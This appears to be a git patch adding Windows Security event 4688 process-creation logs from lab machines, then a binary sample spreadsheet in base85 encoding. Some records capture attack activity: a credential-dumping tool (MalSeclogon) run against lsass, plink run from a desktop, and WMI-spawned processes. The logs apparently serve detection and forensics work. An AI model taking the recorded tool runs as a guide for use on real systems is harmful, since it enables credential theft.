+ + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18196 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x13765 + 0x4f0 + C:\Python27\python.exe + %%1938 + 0x12c + + +" +2019-03-18T15:06:46.345209+04:00,1552907206.345209,4688,C:\Windows\System32\dllhost.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 433078 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0xf6c + C:\Windows\System32\dllhost.exe + %%1936 + 0x278 + + +" +2019-03-18T15:06:42.139161+04:00,1552907202.139161,4688,C:\Windows\System32\conhost.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 432906 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x370 + C:\Windows\System32\conhost.exe + %%1936 + 0x764 + + +" +2019-03-18T15:06:42.139161+04:00,1552907202.139161,4688,C:\Windows\System32\cmd.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 432905 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x440 + C:\Windows\System32\cmd.exe + %%1936 + 0x448 + + +" +2019-03-19T02:16:09.458302+04:00,1552947369.458302,4688,C:\Windows\System32\calc.exe,WIN-77LTAPHIQ1R$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 563299 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-5-20 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x3e4 + 0x424 + C:\Windows\System32\calc.exe + %%1936 + 0xae8 + + +" +2019-03-19T02:15:49.692401+04:00,1552947349.692401,4688,C:\Windows\System32\wbem\WmiPrvSE.exe,WIN-77LTAPHIQ1R$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 563298 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x3e7 + 0xae8 + C:\Windows\System32\wbem\WmiPrvSE.exe + %%1936 + 0x248 + + +" 
+2019-03-19T04:02:07.445773+04:00,1552953727.445773,4688,C:\Windows\System32\wbem\WmiPrvSE.exe,WIN-77LTAPHIQ1R$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 566844 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x3e7 + 0x3b4 + C:\Windows\System32\wbem\WmiPrvSE.exe + %%1936 + 0x248 + + +" +2019-03-19T04:02:04.367441+04:00,1552953724.367441,4688,C:\Windows\System32\tasklist.exe,WIN-77LTAPHIQ1R$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 566839 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x3e7 + 0x970 + C:\Windows\System32\tasklist.exe + %%1936 + 0xbcc + + +" +2019-03-19T04:02:04.351252+04:00,1552953724.351252,4688,C:\Windows\System32\conhost.exe,WIN-77LTAPHIQ1R$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 566838 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x3e7 + 0xebc + C:\Windows\System32\conhost.exe + %%1936 + 0xbcc + + +" +2019-03-19T04:02:04.335561+04:00,1552953724.335561,4688,C:\Windows\System32\cmd.exe,WIN-77LTAPHIQ1R$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 566837 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x3e7 + 0xbcc + C:\Windows\System32\cmd.exe + %%1936 + 0x33c + + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4688,C:\Windows\System32\conhost.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18208 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0x8dc + C:\Windows\System32\conhost.exe + %%1936 + 0x188 + + +" +2019-05-11T21:10:10.904945+04:00,1557594610.904945,4688,C:\Windows\System32\cmd.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18207 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0xc74 + 
C:\Windows\System32\cmd.exe + %%1936 + 0x4f0 + + +" +2019-05-11T21:10:10.889320+04:00,1557594610.88932,4688,C:\Windows\System32\wusa.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18205 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0x5b0 + C:\Windows\System32\wusa.exe + %%1937 + 0x4f0 + + +" +2019-05-11T21:10:10.826820+04:00,1557594610.82682,4688,C:\Windows\System32\dllhost.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18204 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0x27c + C:\Windows\System32\dllhost.exe + %%1936 + 0x258 + + +" +2019-05-11T21:10:10.795570+04:00,1557594610.79557,4688,C:\Windows\System32\dllhost.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18201 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0xec8 + C:\Windows\System32\dllhost.exe + %%1936 + 0x258 + + +" +2019-05-11T21:10:10.654945+04:00,1557594610.654945,4688,C:\Windows\System32\consent.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18198 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0x7f0 + C:\Windows\System32\consent.exe + %%1936 + 0x3c8 + + +" +2019-05-11T21:10:10.623695+04:00,1557594610.623695,4688,C:\Windows\System32\wusa.exe,IEUser,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18197 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x13765 + 0x628 + C:\Windows\System32\wusa.exe + %%1938 + 0x4f0 + + +" +2019-05-11T21:10:10.608070+04:00,1557594610.60807,4688,C:\Python27\python.exe,IEUser,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18196 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x13765 + 0x4f0 + C:\Python27\python.exe + %%1938 + 0x12c + + +" 
+2019-03-18T15:27:05.455663+04:00,1552908425.455663,4688,C:\Windows\System32\wbem\WMIC.exe,user01,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 433308 + + + + + Security + PC01.example.corp + + + + + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x18a7875 + 0x44c + C:\Windows\System32\wbem\WMIC.exe + %%1936 + 0x86c + + +" +2019-02-13T22:05:06.665634+04:00,1550081106.665634,4688,C:\Windows\System32\AtBroker.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227784 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x7f0 + C:\Windows\System32\AtBroker.exe + %%1936 + 0xdec + + +" +2019-02-13T22:05:06.585519+04:00,1550081106.585519,4688,C:\Windows\System32\rdpclip.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227783 + + + + + Security + PC01.example.corp + + + + + S-1-5-20 + PC01$ + EXAMPLE + 0x3e4 + 0xa1c + C:\Windows\System32\rdpclip.exe + %%1936 + 0x500 + + +" +2019-02-13T22:05:05.453892+04:00,1550081105.453892,4688,C:\Windows\System32\TSTheme.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227776 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x9fc + C:\Windows\System32\TSTheme.exe + %%1936 + 0x278 + + +" +2019-02-13T22:05:05.253604+04:00,1550081105.253604,4688,C:\Windows\System32\LogonUI.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227775 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0xce0 + C:\Windows\System32\LogonUI.exe + %%1936 + 0x768 + + +" +2019-02-13T22:05:05.123416+04:00,1550081105.123416,4688,C:\Windows\System32\winlogon.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227774 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x768 + C:\Windows\System32\winlogon.exe + %%1936 + 0x62c + + +" 
+2019-02-13T22:05:04.873056+04:00,1550081104.873056,4688,C:\Windows\System32\csrss.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227773 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0xadc + C:\Windows\System32\csrss.exe + %%1936 + 0x62c + + +" +2019-02-13T22:05:04.802956+04:00,1550081104.802956,4688,C:\Windows\System32\smss.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227772 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x62c + C:\Windows\System32\smss.exe + %%1936 + 0x124 + + +" +2019-02-13T22:05:01.037541+04:00,1550081101.037541,4688,C:\Windows\System32\rundll32.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227769 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x410 + C:\Windows\System32\rundll32.exe + %%1936 + 0x278 + + +" +2019-02-13T22:04:57.862976+04:00,1550081097.862976,4688,C:\Windows\System32\LogonUI.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227751 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0xc70 + C:\Windows\System32\LogonUI.exe + %%1936 + 0x4b8 + + +" +2019-02-13T22:04:57.672703+04:00,1550081097.672703,4688,C:\Windows\System32\winlogon.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227750 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x4b8 + C:\Windows\System32\winlogon.exe + %%1936 + 0x38c + + +" +2019-02-13T22:04:57.542516+04:00,1550081097.542516,4688,C:\Windows\System32\csrss.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227749 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x9d4 + C:\Windows\System32\csrss.exe + %%1936 + 0x38c + + +" 
+2019-02-13T22:04:57.462400+04:00,1550081097.4624,4688,C:\Windows\System32\smss.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227748 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x38c + C:\Windows\System32\smss.exe + %%1936 + 0x124 + + +" +2019-02-13T22:04:01.632120+04:00,1550081041.63212,4688,C:\Windows\System32\UI0Detect.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227726 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x934 + C:\Windows\System32\UI0Detect.exe + %%1936 + 0x990 + + +" +2019-02-13T22:03:35.734882+04:00,1550081015.734882,4688,C:\Windows\System32\slui.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227721 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0xa38 + C:\Windows\System32\slui.exe + %%1936 + 0x278 + + +" +2019-02-13T22:03:28.338519+04:00,1550081008.338519,4688,C:\Users\user01\Desktop\plink.exe,user01,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227714 + + + + + Security + PC01.example.corp + + + + + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x2ed80 + 0xcfc + C:\Users\user01\Desktop\plink.exe + %%1936 + 0xe60 + + +" +2019-02-13T22:02:19.518362+04:00,1550080939.518362,4688,C:\Windows\System32\AtBroker.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227712 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x250 + C:\Windows\System32\AtBroker.exe + %%1936 + 0x1d0 + + +" +2019-02-13T22:01:47.602470+04:00,1550080907.60247,4688,C:\Windows\System32\TSTheme.exe,PC01$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227695 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + 0x1fc + C:\Windows\System32\TSTheme.exe + %%1936 + 0x278 + + +" 
+2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + 
MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2022-05-01T08:42:06.656542+04:00,1651380126.656542,4688,C:\Windows\System32\notepad.exe,WIND10$,C:\Windows\System32\wbem\WmiPrvSE.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 21374 + + + + + Security + wind10.winlab.local + + + + + S-1-5-20 + WIND10$ + WINLAB + 0x3e4 + 0x1dc + C:\Windows\System32\notepad.exe + %%1936 + 0xe8c + + S-1-0-0 + Administrator + WINLAB.LOCAL + 0x82215a + C:\Windows\System32\wbem\WmiPrvSE.exe + S-1-16-12288 + +" -- 2.34.1 From 6055ac9016725b605946aaa1e0abbe0b441b25fa Mon Sep 17 00:00:00 2001 From: pex7hfbnt <1584881064@qq.com> Date: Wed, 16 Oct 2024 23:43:54 +0800 Subject: [PATCH 07/13] ADD file via upload --- source/samples/Sample_Report.xlsx | Bin 0 -> 202427 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 source/samples/Sample_Report.xlsx 
diff --git a/source/samples/Sample_Report.xlsx b/source/samples/Sample_Report.xlsx new file mode 100644 index 0000000000000000000000000000000000000000..59cb16f28e6d6f757a189b7bb5165c31523960f4 GIT binary patch literal 202427 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 